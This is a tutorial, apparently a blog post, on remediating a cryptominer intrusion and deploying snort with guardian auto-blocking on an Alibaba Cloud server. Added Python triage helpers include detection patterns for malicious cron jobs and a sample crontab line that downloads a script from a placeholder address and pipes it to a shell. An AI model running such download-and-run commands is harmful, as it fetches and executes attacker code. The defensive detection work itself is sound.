Building a snort + guardian protection environment on an Alibaba Cloud server

Below is the raw record of the troubleshooting process (for the condensed summary, download the attachment link).

Part 1: Remediation steps after the server was attacked

  1. Obtain the source IP address associated with the attack program
  2. Remove the scheduled (cron) scanning tasks
  3. Remove the abnormal ssh keys
  4. Set a password on Redis (optional; once the defense system is in place the password need not be changed)
  5. Hunt the miner: yum -y install epel-release, then yum -y install unhide
  6. unhide quick: list hidden processes
  7. Block inbound and outbound traffic for the source IP with iptables
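As an added illustration of steps 1, 2, 3 and 7 above (example code written for this page, not part of the original post), the following Python helpers take text captured from the host, the output of ss -antp, a crontab and an authorized_keys file, and pick out what a responder looks for: the remote peers a suspect process talks to, cron entries with the download-and-run shape, SSH keys the administrators do not recognize, and the iptables rules that cut an address off in both directions. The process name suspectd, the indicator patterns, the allow-list and every sample capture are constructed assumptions.

```python
"""Offline triage helpers for the remediation steps above (added example)."""
import re
from ipaddress import ip_address


def peers_of_process(ss_output, process_name):
    """Remote addresses a named process is connected to, from "ss -antp" output.

    Data lines look like (constructed):
    ESTAB 0 0 172.16.0.5:43210 203.0.113.7:443 users:(("name",pid=N,fd=M))
    """
    peers = set()
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0] == "LISTEN":       # header or listening socket
            continue
        if f'"{process_name}"' not in " ".join(fields[5:]):
            continue
        host = fields[4].rpartition(":")[0].strip("[]")   # drop the port; IPv6 is [addr]:port
        try:
            peers.add(str(ip_address(host)))
        except ValueError:
            continue                                      # "*" or a hostname: not an address
    return sorted(peers)


# Cron entries planted by miners usually download and pipe into a shell, decode an
# inline payload, or run something from a scratch directory. Assumed indicator set.
SUSPICIOUS_CRON = [
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    re.compile(r"base64\s+(-d|--decode)"),
    re.compile(r"(^|\s)(/tmp|/dev/shm|/var/tmp)/"),
]


def suspicious_cron_entries(crontab_text):
    """Non-comment crontab lines that match one of the indicators, in file order."""
    hits = []
    for line in crontab_text.splitlines():
        entry = line.strip()
        if entry and not entry.startswith("#") and any(p.search(entry) for p in SUSPICIOUS_CRON):
            hits.append(entry)
    return hits


def unknown_ssh_keys(authorized_keys_text, allowed_keys):
    """authorized_keys entries whose "type blob" is not in the allow-list.

    Entries may carry leading options (command="...", no-pty, ...), so the key
    type is the first token that starts with "ssh-" or "ecdsa-".
    """
    unknown = []
    for line in authorized_keys_text.splitlines():
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        parts = entry.split()
        idx = next((i for i, t in enumerate(parts) if t.startswith(("ssh-", "ecdsa-"))), None)
        if idx is None or idx + 1 >= len(parts) or f"{parts[idx]} {parts[idx + 1]}" not in allowed_keys:
            unknown.append(entry)      # unrecognized key, or a line that does not parse
    return unknown


def iptables_block_commands(ip):
    """The two rules from step 7: drop traffic from and to the address."""
    ip = str(ip_address(ip))           # refuses anything that is not an IP address
    return [f"iptables -I INPUT -s {ip} -j DROP",
            f"iptables -I OUTPUT -d {ip} -j DROP"]


# Constructed sample captures; none of this is real host data.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port   Peer Address:Port   Process
LISTEN 0      128    0.0.0.0:22           0.0.0.0:*           users:(("sshd",pid=900,fd=3))
ESTAB  0      0      172.16.0.5:43210     203.0.113.7:443     users:(("suspectd",pid=1234,fd=5))
ESTAB  0      0      172.16.0.5:43222     203.0.113.7:443     users:(("suspectd",pid=1234,fd=6))
ESTAB  0      0      172.16.0.5:22        198.51.100.20:51000 users:(("sshd",pid=1500,fd=4))
"""
SAMPLE_CRON = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * curl -fsSL http://203.0.113.7/x.sh | sh
* * * * * /tmp/.X11-unix/kthreadd
"""
SAMPLE_KEYS = """\
ssh-ed25519 AAAAKnownAdminKeyBlob admin@corp
command="/usr/bin/rsync --server" ssh-rsa AAAAKnownBackupKeyBlob backup
ssh-rsa AAAAUnknownKeyBlob root@elsewhere
"""
ALLOWED_KEYS = {"ssh-ed25519 AAAAKnownAdminKeyBlob", "ssh-rsa AAAAKnownBackupKeyBlob"}

if __name__ == "__main__":
    for peer in peers_of_process(SAMPLE_SS, "suspectd"):
        print("\n".join(iptables_block_commands(peer)))
    print(suspicious_cron_entries(SAMPLE_CRON))
    print(unknown_ssh_keys(SAMPLE_KEYS, ALLOWED_KEYS))
```

The functions only report; the iptables commands are returned as strings so they can be reviewed before anything is applied, and an invalid address raises ValueError instead of producing a rule.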


Test environment:

(snort+guardian host) server 1.1.1.1 ------------------- server 2.2.2.2


Part 2: Install snort for intrusion detection
yum install https://www.snort.org/downloads/snort/snort-2.9.16-1.centos7.x86_64.rpm
yum install libdnet
Running snort from the shell fails with:
snort: error while loading shared libraries: libdnet.1: cannot open shared object file: No such file or directory
libdnet.1 is present under /usr/lib64, and the symlink exists as well.
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/lib64
Running snort still gives the same error.

readelf -a snort shows what is going on with the library dependency: the ELF contains
0x000000000000000f (RPATH)              Library rpath: [/usr/local/lib]
so the binary's library search path is pinned to /usr/local/lib.
Therefore copy /usr/lib64/libdnet.so.1.0.1 to /usr/local/lib and create the symlink there: ln -s libdnet.so.1.0.1 libdnet.1

Type snort in the shell.
It now starts, initializes, runs its various checks and reports the warning: WARNING: No preprocessors configured for policy 0.
At this point snort is installed and runs.
Next, create the snort rule database:
Go to the official site to download a rule package. There are three kinds: the community package, the registered package and the subscription package (paid).
Here we register a user with the company e-mail address and download snortrules-snapshot-29160.tar.gz from the registered package, which matches the installed version.
Rule database installation steps:
1. mkdir /root/rule
   tar zxvf snortrules-snapshot-29160.tar.gz  // after extracting we find that all rules and configuration files in this package are already written; customizing our own rules is covered later
2. cp -R -f /root/rule/preproc_rules /root/rule/rules /root/rule/so_rules /etc/snort
   cp -R -f /root/rule/etc /etc/snort

Part 3: Configure snort
1. vim /etc/snort/snort.conf
   ipvar HOME_NET 1.1.1.1  // monitor the real NIC address of the Alibaba Cloud host, which is the private address: traffic arriving on the public address is always translated to the private NIC address
2. Adjust the path variables
var LIB_PATH /usr/lib64
var CONF_PATH /etc/snort
var RULE_PATH $CONF_PATH/rules
var SO_RULE_PATH $CONF_PATH/so_rules
var PREPROC_RULE_PATH $CONF_PATH/preproc_rules
var WHITE_LIST_PATH $CONF_PATH/rules
var BLACK_LIST_PATH $CONF_PATH/rules
3. Trim the rules
   snort.conf currently includes every detection rule from the rule package we downloaded; local.rules is empty and we add no extra detection rules for now
4. Add the NIC to monitor
   vim /etc/sysconfig/snort
INTERFACE=eth0  // the Alibaba Cloud host has only one physical NIC, eth0; the docker0 virtual bridge of the container platform does not need monitoring for now

5. Start the snort service: service snortd start
Check whether it started with service snortd status; it reports:
 snortd.service - SYSV: snort is a lightweight network intrusion detection tool that currently detects more than 1100 host and network vulnerabilities, portscans, backdoors, and more.
   Loaded: loaded (/etc/rc.d/init.d/snortd; bad; vendor preset: disabled)
   Active: active (exited) since Sat 2020-05-23 14:08:51 CST; 11s ago
     Docs: man:systemd-sysv-generator(8)
  Process: 3288 ExecStop=/etc/rc.d/init.d/snortd stop (code=exited, status=0/SUCCESS)
  Process: 3327 ExecStart=/etc/rc.d/init.d/snortd start (code=exited, status=0/SUCCESS)

May 23 14:08:51 znzz002 snort[3336]: 
May 23 14:08:51 znzz002 snort[3336]: PortVar 'SHELLCODE_PORTS' defined :
May 23 14:08:51 znzz002 snort[3336]:  [ 0:79 81:65535 ]
May 23 14:08:51 znzz002 snort[3336]: 
May 23 14:08:51 znzz002 snort[3336]: PortVar 'ORACLE_PORTS' defined :
May 23 14:08:51 znzz002 snort[3336]:  [ 1024:65535 ]
May 23 14:08:51 znzz002 snort[3336]: 
May 23 14:08:51 znzz002 snort[3336]: PortVar 'SSH_PORTS' defined :
May 23 14:08:51 znzz002 systemd[1]: Started SYSV: snort is a lightweight network intrusion detection tool that currently detects more than 1100 host and netw... and more..
May 23 14:08:51 znzz002 snortd[3327]: Starting snort: [FAILED]
Hint: Some lines were ellipsized, use -l to show in full.

Because the service was started via service, check cat /var/log/messages, which shows:
May 23 14:26:17 localhost snort[5255]: FATAL ERROR: /etc/snort/snort.conf(259) Could not stat dynamic module path "/usr/lib64/snort_dynamicrules": No such file or directory.

find / -name snort_dynamicrules finds nothing: the directory is missing.
mkdir -p /usr/lib64/snort_dynamicrules

Restart the service: it still fails
May 23 14:39:00 localhost snort[6528]: FATAL ERROR: /etc/snort/snort.conf(518) => Unable to open address file /etc/snort/../rules/white_list.rules, Error: No such file or directory
Manually create white_list.rules and black_list.rules under /etc/snort/rules/ with empty contents.
cd /etc/snort/rules
touch white_list.rules
touch black_list.rules

This time it starts successfully.
[root@znzz002 lib64]# service snortd status
● snortd.service - SYSV: snort is a lightweight network intrusion detection tool that currently detects more than 1100 host and network vulnerabilities, portscans, backdoors, and more.
   Loaded: loaded (/etc/rc.d/init.d/snortd; bad; vendor preset: disabled)
   Active: active (running) since Sat 2020-05-23 14:51:36 CST; 58s ago
     Docs: man:systemd-sysv-generator(8)
  Process: 7899 ExecStop=/etc/rc.d/init.d/snortd stop (code=exited, status=0/SUCCESS)
  Process: 5193 ExecReload=/etc/rc.d/init.d/snortd reload (code=exited, status=0/SUCCESS)
  Process: 7922 ExecStart=/etc/rc.d/init.d/snortd start (code=exited, status=0/SUCCESS)
    Tasks: 2
   Memory: 695.1M
   CGroup: /system.slice/snortd.service
           └─7944 /usr/sbin/snort -A fast -b -d -D -i eth0 -u snort -g snort -c /etc/snort/snort.conf -l /var/log/snort

May 23 14:51:36 znzz002 snort[7944]:            Preprocessor Object: SF_SIP  Version 1.1  <Build 1>
May 23 14:51:36 znzz002 snort[7944]:            Preprocessor Object: SF_DNS  Version 1.1  <Build 4>
May 23 14:51:36 znzz002 snort[7944]:            Preprocessor Object: SF_DNP3  Version 1.1  <Build 1>
May 23 14:51:36 znzz002 snort[7944]:            Preprocessor Object: SF_IMAP  Version 1.0  <Build 1>
May 23 14:51:36 znzz002 snort[7944]:            Preprocessor Object: SF_DCERPC2  Version 1.0  <Build 3>
May 23 14:51:36 znzz002 snort[7944]:            Preprocessor Object: SF_FTPTELNET  Version 1.2  <Build 13>
May 23 14:51:36 znzz002 snort[7944]:            Preprocessor Object: SF_POP  Version 1.0  <Build 1>
May 23 14:51:36 znzz002 snort[7944]:            Preprocessor Object: SF_GTP  Version 1.1  <Build 1>
May 23 14:51:36 znzz002 snort[7944]:            Preprocessor Object: SF_SSLPP  Version 1.1  <Build 4>
May 23 14:51:36 znzz002 snort[7944]: Commencing packet processing (pid=7944)

[root@znzz002 lib64]# ps -aux |grep snort
snort     7944  0.0  8.9 801796 713560 ?       Ssl  14:51   0:00 /usr/sbin/snort -A fast -b -d -D -i eth0 -u snort -g snort -c /etc/snort/snort.conf -l /var/log/snort

6. Test
snort -T -i eth0 -c /etc/snort/snort.conf
Output:
Snort successfully validated the configuration!
Snort exiting
At this point snort is running properly.

Now test a rule: vim /etc/snort/rules/local.rules
alert icmp 2.2.2.2 any -> any any (msg:"snort test";sid:1000001;)
Ping this host from 2.2.2.2; the alert fires in /var/log/snort/alert on this host.

7. View the attack alert log
tail -f /var/log/snort/alert

This completes the deployment of snort, the open-source passive detection component.

Part 4: Install the active defense system Guardian
How Guardian works: a daemon continuously watches /var/log/snort/alert; as soon as an alert appears it blocks the IP address named in that alert, and after a period of time it automatically unblocks the address again. Its advantage over manual handling is that the block happens in advance or at the very first step of an intrusion, whereas manual handling necessarily comes after the intrusion has already succeeded.
1. Download guardian-1.7.tar.gz and extract it
   cp guardian.pl /usr/local/bin/                                       // the executable
   cp scripts/iptables_block.sh /usr/local/bin/guardian_block.sh         // iptables script that blocks an IP
   cp scripts/iptables_unblock.sh /usr/local/bin/guardian_unblock.sh     // iptables script that unblocks an IP
   cp guardian.conf /etc/snort/                                          // guardian configuration file
   touch /etc/snort/guardian.ignore   // IP addresses listed in this file get no reaction at all; it works somewhat like a whitelist
   touch /etc/snort/guardian.target   // the local IP addresses to protect. For example, if the NIC has sub-interfaces eth:0 and eth:1, the default is eth:0; if eth:1 is not listed in this file, guardian will not react even when eth:1 is attacked and snort writes an alert
   touch /etc/snort/guardian.log      // log file

2. Configure /etc/snort/guardian.conf
HostIpAddr      1.1.1.1              // the actual NIC address of the Alibaba Cloud host
Interface       eth0
LogFile         /var/log/snort/guardian.log
AlertFile       /var/log/snort/alert
IgnoreFile      /etc/snort/guardian.ignore
TargetFile      /etc/snort/guardian.target

3. Create the start script
vim /usr/local/bin/guardian.sh

#!/bin/bash
# start/stop/status wrapper for guardian.pl

cd /usr/local/bin || exit 1

# Pattern matching the running guardian process. The " *" between "guardian.pl"
# and "-c" keeps grep from matching its own command line in the ps output.
PATTERN='guardian.pl *-c'

start()
{
  export PATH=$PATH:/usr/local/bin
  /usr/local/bin/guardian.pl -c/etc/snort/guardian.conf
}

stop()
{
  if ps aux | grep "$PATTERN" > /dev/null 2>&1; then
    # kill needs the PID (column 2 of ps aux), not the whole ps line
    kill $(ps aux | grep "$PATTERN" | awk '{print $2}')
  else
    echo "guardian is not running ...."
  fi
}

status()
{
  if ps aux | grep "$PATTERN" > /dev/null 2>&1; then
    echo "guardian is running ...."
  else
    echo "guardian is not running ...."
  fi
}

case "$1" in
start)
  start
  ;;
stop)
  stop
  ;;
restart)
  stop
  start
  ;;
status)
  status
  ;;
*)
  echo $"Usage: $0 {start|stop|restart|status}"
  ;;
esac

Running the script reports: Can't locate getopts.pl
Install it: yum -y install cpan
cpan Module::Build
cpan Perl4::CoreLibs
cp getopts.pl /usr/local/bin

Run guardian.sh start again
Error:
Warning! HostIpAddr is undefined! Attempting to guess..
Couldn't figure out the ip address
Add HostIpAddr 1.1.1.1 to /etc/snort/guardian.conf with vim


Run guardian.sh start again; it reports: Warning! Logfile is not writeable! Engaging debug mode, output to STDOUT
Create the log file: touch /var/log/snort/guardian.log
Start guardian.sh start once more; this time it starts:
[root@znzz002 bin]# ./guardian.sh start
OS shows Linux
My ip address and interface are: 1.1.1.1       eth0
Loaded 0 addresses from /etc/snort/guardian.ignore
Loaded 0 addresses from /etc/snort/guardian.target
Becoming a daemon..

[root@znzz002 bin]# ps -aux |grep guardian
root     21013  0.0  0.0 132212  1588 pts/0    S    10:38   0:00 /usr/bin/perl /usr/local/bin/guardian.pl -c/etc/snort/guardian.conf
root     21052  0.0  0.0 112812   972 pts/0    S+   10:38   0:00 grep --color=auto guardian

Next, add the service start command to the boot sequence:
vim /etc/rc.d/rc.local
At this point the snort detection and guardian defense environment is complete.

Part 5: snort + guardian integration test

(snort+guardian host) server 1.1.1.1 ------------------- server 2.2.2.2

vim /etc/snort/guardian.target

Enter the target address guardian should watch: 1.1.1.1

vim /etc/snort/rules/local.rules  // custom alert rule

alert icmp 2.2.2.2 any -> any any (msg:"snort test";sid:1000001;)

Then ping 1.1.1.1 from 2.2.2.2.

We observe that packets start being dropped somewhere between the 2nd and the 3rd packet, i.e. dropping begins with the 3rd packet. This is because guardian's monitoring process scans once per second, so the second packet still gets through within that second. From the third packet on, guardian on 1.1.1.1 has installed an iptables rule in the INPUT chain that drops the packets coming from 2.2.2.2.
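To make the hand-off between snort and guardian concrete, here is a Python model of the decision loop described in Part 4 and exercised in the test above. It is an added example, not guardian's own Perl code: it parses snort's fast-format alert lines (the format written to /var/log/snort/alert by the -A fast option seen in the service status), applies the guardian.ignore and guardian.target semantics, records the INPUT-chain DROP that would be installed, and removes it again once a time limit has passed. The 60-second limit, the alert lines, the list contents and the exact iptables arguments are constructed assumptions.

```python
"""Model of guardian's alert-to-block decision loop (added example, not guardian code)."""
import re

# One snort "-A fast" alert line, e.g. (constructed):
# 05/23-14:51:40.000001  [**] [1:1000001:0] snort test [**] [Priority: 0] {ICMP} 2.2.2.2 -> 1.1.1.1
FAST_ALERT = re.compile(
    r"^(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\].*?"
    r"\{(?P<proto>\w+)\}\s+(?P<src>\d+\.\d+\.\d+\.\d+)(?::\d+)?\s+->\s+"
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)(?::\d+)?$"
)


def parse_fast_alert(line):
    """Fields of one fast-format alert line (IPv4, with or without ports), or None."""
    m = FAST_ALERT.match(line.strip())
    return m.groupdict() if m else None


def load_ip_list(text):
    """guardian.ignore / guardian.target contents: one address per line, '#' comments."""
    ips = set()
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            ips.add(line)
    return ips


class Guardian:
    """Each scan() is one pass over the lines appended to the alert file since the
    previous pass; the real daemon makes such a pass about once a second."""

    def __init__(self, host_ip, interface, ignore_ips, target_ips, time_limit):
        self.interface = interface
        self.ignore = set(ignore_ips) | {host_ip}      # never block the host itself
        self.target = set(target_ips) or {host_ip}     # empty target file: protect the host address only
        self.time_limit = time_limit                   # seconds an address stays blocked (assumed value)
        self.blocked = {}                              # src ip -> time it was blocked
        self.commands = []                             # iptables commands issued, in order

    def scan(self, new_lines, now):
        for line in new_lines:
            alert = parse_fast_alert(line)
            if alert is None:
                continue
            src, dst = alert["src"], alert["dst"]
            if dst not in self.target:                 # attacked address not listed: no reaction
                continue
            if src in self.ignore or src in self.blocked:
                continue                               # white-listed, or a rule already exists
            self.blocked[src] = now
            self.commands.append(f"iptables -I INPUT -s {src} -i {self.interface} -j DROP")
        self.expire(now)

    def expire(self, now):
        """Lift blocks whose time limit has passed."""
        for src, since in list(self.blocked.items()):
            if now - since >= self.time_limit:
                del self.blocked[src]
                self.commands.append(f"iptables -D INPUT -s {src} -i {self.interface} -j DROP")


# Constructed alert lines: the local.rules test rule firing on pings from 2.2.2.2,
# one alert from an address on the ignore list, and one against an unlisted address.
SAMPLE_ALERTS = [
    "05/23-14:51:40.000001  [**] [1:1000001:0] snort test [**] [Priority: 0] {ICMP} 2.2.2.2 -> 1.1.1.1",
    "05/23-14:51:41.000002  [**] [1:1000001:0] snort test [**] [Priority: 0] {ICMP} 2.2.2.2 -> 1.1.1.1",
    "05/23-14:51:41.500000  [**] [1:1000001:0] snort test [**] [Priority: 0] {ICMP} 10.0.0.9 -> 1.1.1.1",
    "05/23-14:51:42.000000  [**] [1:1000001:0] snort test [**] [Priority: 0] {ICMP} 3.3.3.3 -> 1.1.1.2",
]


def run_demo():
    g = Guardian("1.1.1.1", "eth0",
                 load_ip_list("10.0.0.9   # monitoring host, never block\n"),
                 load_ip_list("1.1.1.1\n"),
                 time_limit=60)
    g.scan(SAMPLE_ALERTS[:1], now=0)    # first pass: the first ping alert -> block 2.2.2.2
    g.scan(SAMPLE_ALERTS[1:], now=1)    # second pass: duplicate, ignored source, unlisted target
    g.scan([], now=61)                  # time limit reached: the rule is removed again
    return g.commands


if __name__ == "__main__":
    print("\n".join(run_demo()))
```

The second pass produces no new rule: the repeated alert from 2.2.2.2 is already covered, 10.0.0.9 is on the ignore list, and the alert against 1.1.1.2 is dropped because that address is not in guardian.target, which is exactly the behaviour the guardian.target comment in Part 4 warns about for an unlisted sub-interface.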